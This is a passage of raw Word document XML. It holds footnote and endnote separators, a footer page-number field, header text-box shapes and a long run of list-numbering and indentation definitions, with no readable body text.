      <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="726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B6390" w14:textId="77777777" w:rsidR="00347584" w:rsidRDefault="00347584">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="59F8CEF1" w14:textId="77777777" w:rsidR="00347584" w:rsidRDefault="00347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41158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44E4128" w14:textId="77777777" w:rsidR="001E4BD6" w:rsidRDefault="001E4BD6">
        <w:pPr>
          <w:pStyle w:val="a8"/>
          <w:jc w:val="right"/>
        </w:pPr>
      </w:p>
      <w:p w14:paraId="58C9DE12" w14:textId="5ED1DE69" w:rsidR="001E4BD6" w:rsidRPr="001E4BD6" w:rsidRDefault="001E4BD6">
        <w:pPr>
          <w:pStyle w:val="a8"/>
          <w:jc w:val="right"/>
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
        </w:pPr>
        <w:r w:rsidRPr="001E4BD6">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="001E4BD6">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r w:rsidRPr="001E4BD6">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="001E4BD6">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="001E4BD6">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="038D3E0D" w14:textId="77777777" w:rsidR="001E4BD6" w:rsidRDefault="001E4BD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64591" w14:textId="77777777" w:rsidR="00347584" w:rsidRDefault="00347584">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5C13BA37" w14:textId="77777777" w:rsidR="00347584" w:rsidRDefault="003475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50E3E" w14:textId="201AE93F" w:rsidR="002F3F81" w:rsidRDefault="00D934DD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75413F65" wp14:editId="4D3FB54B">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>6996430</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>446405</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="243840" cy="18478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C9DE5" w14:textId="5022378A" w:rsidR="002F3F81" w:rsidRDefault="002F3F81">
                          <w:pPr>
                            <w:pStyle w:val="a3"/>
                            <w:kinsoku w:val="0"/>
                            <w:overflowPunct w:val="0"/>
                            <w:spacing w:before="20"/>
                            <w:ind w:left="60"/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413F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0.9pt;margin-top:35.15pt;width:19.2pt;height:14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" o:allowincell="f" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="185C9DE5" w14:textId="5022378A" w:rsidR="002F3F81" w:rsidRDefault="002F3F81">
                    <w:pPr>
                      <w:pStyle w:val="a3"/>
                      <w:kinsoku w:val="0"/>
                      <w:overflowPunct w:val="0"/>
                      <w:spacing w:before="20"/>
                      <w:ind w:left="60"/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97A45" w14:textId="77777777" w:rsidR="001E4BD6" w:rsidRDefault="001E4BD6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0AC45F9E" wp14:editId="2A94ECDE">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>6996430</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>446405</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="243840" cy="184785"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="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B2C1DB" w14:textId="77777777" w:rsidR="001E4BD6" w:rsidRDefault="001E4BD6">
                          <w:pPr>
                            <w:pStyle w:val="a3"/>
                            <w:kinsoku w:val="0"/>
                            <w:overflowPunct w:val="0"/>
                            <w:spacing w:before="20"/>
                            <w:ind w:left="60"/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C45F9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50.9pt;margin-top:35.15pt;width:19.2pt;height:14.5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" o:allowincell="f" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="6CB2C1DB" w14:textId="77777777" w:rsidR="001E4BD6" w:rsidRDefault="001E4BD6">
                    <w:pPr>
                      <w:pStyle w:val="a3"/>
                      <w:kinsoku w:val="0"/>
                      <w:overflowPunct w:val="0"/>
                      <w:spacing w:before="20"/>
                      <w:ind w:left="60"/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о"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2758" w:hanging="212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1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4167" w:hanging="281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2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4856" w:hanging="281"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5552" w:hanging="281"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6248" w:hanging="281"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6945" w:hanging="281"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7641" w:hanging="281"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8337" w:hanging="281"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9033" w:hanging="281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"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="511"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="51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1"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3393" w:hanging="511"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4398" w:hanging="511"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5403" w:hanging="511"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6407" w:hanging="511"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7412" w:hanging="511"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8417" w:hanging="511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-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="332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1384" w:hanging="332"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2389" w:hanging="332"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3393" w:hanging="332"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4398" w:hanging="332"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5403" w:hanging="332"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6407" w:hanging="332"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7412" w:hanging="332"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8417" w:hanging="332"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000405"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000888"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="605"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="605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1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="808"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"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3393" w:hanging="808"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4398" w:hanging="808"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5403" w:hanging="808"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6407" w:hanging="808"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7412" w:hanging="808"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8417" w:hanging="808"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000406"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000889"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="602"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="602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02"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3393" w:hanging="602"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4398" w:hanging="602"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5403" w:hanging="602"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6407" w:hanging="602"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7412" w:hanging="602"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8417" w:hanging="602"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000407"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000088A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="514"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="514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4"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3393" w:hanging="514"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4398" w:hanging="514"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5403" w:hanging="514"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6407" w:hanging="514"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7412" w:hanging="514"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8417" w:hanging="514"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000408"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000088B"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="641"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="64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41"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3393" w:hanging="641"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4398" w:hanging="641"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5403" w:hanging="641"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6407" w:hanging="641"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7412" w:hanging="641"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8417" w:hanging="641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"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1514" w:hanging="425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2410" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3301" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4191" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5082" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5973" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6863" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7754" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8645" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000040A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000088D"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="677"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="677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3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4009" w:hanging="240"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
        <w:bCs/>
        <w:spacing w:val="-3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4011" w:hanging="240"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
        <w:bCs/>
        <w:spacing w:val="-6"/>
        <w:w w:val="100"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5621" w:hanging="240"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6422" w:hanging="240"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7223" w:hanging="240"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8024" w:hanging="240"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8824" w:hanging="240"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000040B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000088E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000040C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000088F"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1514" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1514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708"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
        <w:bCs/>
        <w:spacing w:val="-30"/>
        <w:w w:val="100"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3499" w:hanging="708"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4488" w:hanging="708"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5478" w:hanging="708"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6468" w:hanging="708"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7457" w:hanging="708"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8447" w:hanging="708"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000040D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000890"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000040E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000891"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000040F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000892"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="5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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000410"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000893"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="6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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000411"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000894"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1510" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1510" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0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3301" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4191" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5082" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5973" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6863" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7754" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
